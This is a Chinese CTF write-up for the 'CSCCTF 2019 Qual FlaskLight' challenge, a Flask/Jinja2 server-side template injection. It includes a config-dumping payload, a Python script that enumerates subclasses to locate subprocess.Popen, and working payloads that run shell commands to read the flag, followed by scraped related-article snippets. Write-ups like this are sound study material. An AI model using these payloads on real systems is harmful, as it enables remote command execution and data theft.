[CSCCTF 2019 Qual] FlaskLight

信息收集

index大致就这样，没什么信息

F12看下，发现了线索：search参数

试下ssti

基本就是ssti了

漏洞利用

config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。
{{ config.items() }}    // 查看配置项目的信息
输入：http://xxxxx//?search={{%20config.items()%20}}

爆出一堆信息，这里获得第二个线索，flag在这个目录

You searched for:
[('JSON_AS_ASCII', True), ('USE_X_SENDFILE', False), ('SESSION_COOKIE_SECURE', False), ('SESSION_COOKIE_PATH', None), ('SESSION_COOKIE_DOMAIN', False), ('SESSION_COOKIE_NAME', 'session'), ('MAX_COOKIE_SIZE', 4093), ('SESSION_COOKIE_SAMESITE', None), ('PROPAGATE_EXCEPTIONS', None), ('ENV', 'production'), ('DEBUG', False), ('SECRET_KEY', 'CCC{f4k3_Fl49_:v} CCC{the_flag_is_this_dir}'), ('EXPLAIN_TEMPLATE_LOADING', False), ('MAX_CONTENT_LENGTH', None), ('APPLICATION_ROOT', '/'), ('SERVER_NAME', None), ('PREFERRED_URL_SCHEME', 'http'), ('JSONIFY_PRETTYPRINT_REGULAR', False), ('TESTING', False), ('PERMANENT_SESSION_LIFETIME', datetime.timedelta(31)), ('TEMPLATES_AUTO_RELOAD', None), ('TRAP_BAD_REQUEST_ERRORS', None), ('JSON_SORT_KEYS', True), ('JSONIFY_MIMETYPE', 'application/json'), ('SESSION_COOKIE_HTTPONLY', True), ('SEND_FILE_MAX_AGE_DEFAULT', datetime.timedelta(0, 43200)), ('PRESERVE_CONTEXT_ON_EXCEPTION', None), ('SESSION_REFRESH_EACH_REQUEST', True), ('TRAP_HTTP_EXCEPTIONS', False)]Here is your result
[]

看了大佬的wp，得知{{''.__class__.__mro__[2].__subclasses__()}}可以爆出所有类，暂且不知原理
同样copy自大佬的exp

#查找可以利用的类 利用subprocess.Popen执行命令
import requests
import re
import html
import timeindex = 0
for i in range(170, 1000):try:url = "http://xxxx/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"r = requests.get(url)res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)time.sleep(0.1)# print(res)# print(r.text)res = html.unescape(res[0])print(str(i) + " | " + res)if "subprocess.Popen" in res:index = ibreakexcept:continue
print("indexo of subprocess.Popen:" + str(index))

输出结果

170 | <class 'jinja2.environment.Environment'>
171 | <class 'jinja2.environment.Template'>
173 | <class 'jinja2.environment.TemplateExpression'>
174 | <class 'jinja2.environment.TemplateStream'>
175 | <class 'jinja2.loaders.BaseLoader'>
176 | <type 'datetime.date'>
177 | <type 'datetime.timedelta'>
178 | <type 'datetime.time'>
179 | <type 'datetime.tzinfo'>
180 | <class 'logging.LogRecord'>
181 | <class 'logging.Formatter'>
182 | <class 'logging.BufferingFormatter'>
183 | <class 'logging.Filter'>
184 | <class 'logging.Filterer'>
185 | <class 'logging.PlaceHolder'>
186 | <class 'logging.Manager'>
187 | <class 'logging.LoggerAdapter'>
188 | <class 'werkzeug._internal._Missing'>
189 | <class 'werkzeug._internal._DictAccessorProperty'>
190 | <class 'werkzeug.utils.HTMLBuilder'>
191 | <class 'werkzeug.exceptions.Aborter'>
192 | <class 'werkzeug.urls.Href'>
193 | <type 'select.epoll'>
194 | <class 'click._compat._FixupStream'>
195 | <class 'click._compat._AtomicFile'>
196 | <class 'click.utils.LazyFile'>
197 | <class 'click.utils.KeepOpenFile'>
198 | <class 'click.utils.PacifyFlushWrapper'>
199 | <class 'click.parser.Option'>
200 | <class 'click.parser.Argument'>
201 | <class 'click.parser.ParsingState'>
202 | <class 'click.parser.OptionParser'>
203 | <class 'click.types.ParamType'>
204 | <class 'click.formatting.HelpFormatter'>
205 | <class 'click.core.Context'>
206 | <class 'click.core.BaseCommand'>
207 | <class 'click.core.Parameter'>
208 | <class 'werkzeug.serving.WSGIRequestHandler'>
209 | <class 'werkzeug.serving._SSLContext'>
210 | <class 'werkzeug.serving.BaseWSGIServer'>
211 | <class 'werkzeug.datastructures.ImmutableListMixin'>
212 | <class 'werkzeug.datastructures.ImmutableDictMixin'>
213 | <class 'werkzeug.datastructures.UpdateDictMixin'>
214 | <class 'werkzeug.datastructures.ViewItems'>
215 | <class 'werkzeug.datastructures._omd_bucket'>
216 | <class 'werkzeug.datastructures.Headers'>
217 | <class 'werkzeug.datastructures.ImmutableHeadersMixin'>
218 | <class 'werkzeug.datastructures.IfRange'>
219 | <class 'werkzeug.datastructures.Range'>
220 | <class 'werkzeug.datastructures.ContentRange'>
221 | <class 'werkzeug.datastructures.FileStorage'>
222 | <class 'email.LazyImporter'>
223 | <class 'calendar.Calendar'>
224 | <class 'werkzeug.wrappers.accept.AcceptMixin'>
225 | <class 'werkzeug.wrappers.auth.AuthorizationMixin'>
226 | <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>
227 | <class 'werkzeug.wsgi.ClosingIterator'>
228 | <class 'werkzeug.wsgi.FileWrapper'>
229 | <class 'werkzeug.wsgi._RangeWrapper'>
230 | <class 'werkzeug.formparser.FormDataParser'>
231 | <class 'werkzeug.formparser.MultiPartParser'>
232 | <class 'werkzeug.wrappers.base_request.BaseRequest'>
233 | <class 'werkzeug.wrappers.base_response.BaseResponse'>
234 | <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>
235 | <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>
236 | <class 'werkzeug.wrappers.etag.ETagRequestMixin'>
237 | <class 'werkzeug.wrappers.etag.ETagResponseMixin'>
238 | <class 'werkzeug.wrappers.cors.CORSRequestMixin'>
239 | <class 'werkzeug.wrappers.cors.CORSResponseMixin'>
240 | <class 'werkzeug.useragents.UserAgentParser'>
241 | <class 'werkzeug.useragents.UserAgent'>
242 | <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>
243 | <class 'werkzeug.wrappers.request.StreamOnlyMixin'>
244 | <class 'werkzeug.wrappers.response.ResponseStream'>
245 | <class 'werkzeug.wrappers.response.ResponseStreamMixin'>
246 | <class 'werkzeug.test._TestCookieHeaders'>
247 | <class 'werkzeug.test._TestCookieResponse'>
248 | <class 'werkzeug.test.EnvironBuilder'>
249 | <class 'werkzeug.test.Client'>
250 | <class 'uuid.UUID'>
251 | <type 'CArgObject'>
252 | <type '_ctypes.CThunkObject'>
253 | <type '_ctypes._CData'>
254 | <type '_ctypes.CField'>
255 | <type '_ctypes.DictRemover'>
256 | <class 'ctypes.CDLL'>
257 | <class 'ctypes.LibraryLoader'>
258 | <class 'subprocess.Popen'>
indexo of subprocess.Popen:258

得到了subprocess.Popen:258

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}

Reference

Templates Injections
刷题[CSCCTF 2019 Qual]FlaskLight
官方wp

[CSCCTF 2019 Qual] FlaskLight相关推荐

一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI
目录 SSTI 无二次渲染的示例存在二次渲染的示例漏洞复现 [CSCCTF 2019 Qual]FlaskLight 做这道题的时候,再次深入了解了一下SSTI,不过发现去讲解这题原理的文章实在是 ...
[CSCCTF 2019 Qual]FlaskLight——直取flag？
[CSCCTF 2019 Qual]FlaskLight 前言白天一直在上课,晚上赶快躲进图书馆里面打打靶场.这次的题目算是很简单的一道题目了,我做完之后还去看了看其他师傅写的博客,只能感叹一声太强 ...
ssti练习之[CSCCTF 2019 Qual]FlaskLight 1
[CSCCTF 2019 Qual]FlaskLight 1 查看网页源代码,发现里面的提示尝试输入url http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.n ...
BUUCTF：[CSCCTF 2019 Qual]FlaskLight
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?searc ...
[CSCCTF 2019 Qual]FlaskLight SSTI注入
进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎可以发现在searched后面输出了49 ...
[CSCCTF 2019 Qual]FlaskLight 记录
这个根据题目名字,flask模板注入,找注入点查看源码发现GET传参直接测试模板注入常规模板注入试了试之前做过的模板注入,都行不通然后百度了一波,原来这是python2的难怪不行 {{'' ...
[BUU刷题记录]day01-起步
BUU-WEB 这是一个菜鸡的蜕变先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io contain ...
buu(ssti模板注入、ssrf服务器请求伪造)
目录目录 [CISCN2019 华东南赛区]Web11 [BJDCTF2020]EasySearch [De1CTF 2019]SSRF Me [CSCCTF 2019 Qual]FlaskLigh ...
BUUCTF-模板注入专项刷题
SSTI: 目录简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018 ...

[CSCCTF 2019 Qual] FlaskLight

信息收集

漏洞利用

Reference

[CSCCTF 2019 Qual] FlaskLight相关推荐

最新文章

热门文章